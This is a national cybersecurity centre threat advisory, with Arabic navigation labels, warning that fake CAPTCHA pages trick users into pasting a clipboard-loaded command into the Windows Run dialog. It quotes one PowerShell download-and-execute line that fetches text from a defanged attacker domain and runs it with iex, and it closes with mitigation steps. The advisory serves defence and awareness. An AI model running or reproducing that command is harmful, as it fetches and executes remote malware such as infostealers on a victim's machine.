
- الصفحة الرئيسية
- نشرات التهديدات
- NCSC-TAD-2410-001
NCSC-TAD-2410-001
الرقم المرجعي: NCSC-TAD-2410-001CVSS 0
Fake CAPTCHAs Distribute Malware
- نوع التهديد:
- غير متوفر
- مستوى المشاركة (TLP):
- GREEN
- CVE:
- غير متوفر
نظرة عامة
Threat actors are leveraging fake CAPTCHA verification to trick users into installing malware. Users are often drawn to malicious websites that offer free content such as movies or other media. Upon attempting to access such content, users are redirected to a fake CAPTCHA verification page designed to appear legitimate.
When the victim clicks on the "I'm not a robot" button, the malicious website executes a script that silently copies a malicious text string to the victim's clipboard. The user is then presented with what appears to be verification steps to trick the user into opening the "Run" dialog box and pasting the copied text.
The malicious code often leverages PowerShell to download additional malicious files from the threat actor's website.
An example of the PowerShell malicious code is: PowerShell.exe" -W Hidden -command $url = 'hxxps://finalstepgetshere[.]com/uploads/il11.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text”
The downloaded files can contain various malware like infostealers, network scanners, or other malicious tools. This allows the threat actor to gain unauthorized access to sensitive information or establish a foothold within the victim's network for further lateral movement.
إجراءات الحد من المخاطر والإجراءات الفورية
- 01
Educate Employees/Users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.
- 02
Implement and maintain robust endpoint protection solutions to detect and block PowerShell-based attacks.
- 03
Monitor network traffic for suspicious connections to newly registered or uncommon domains.

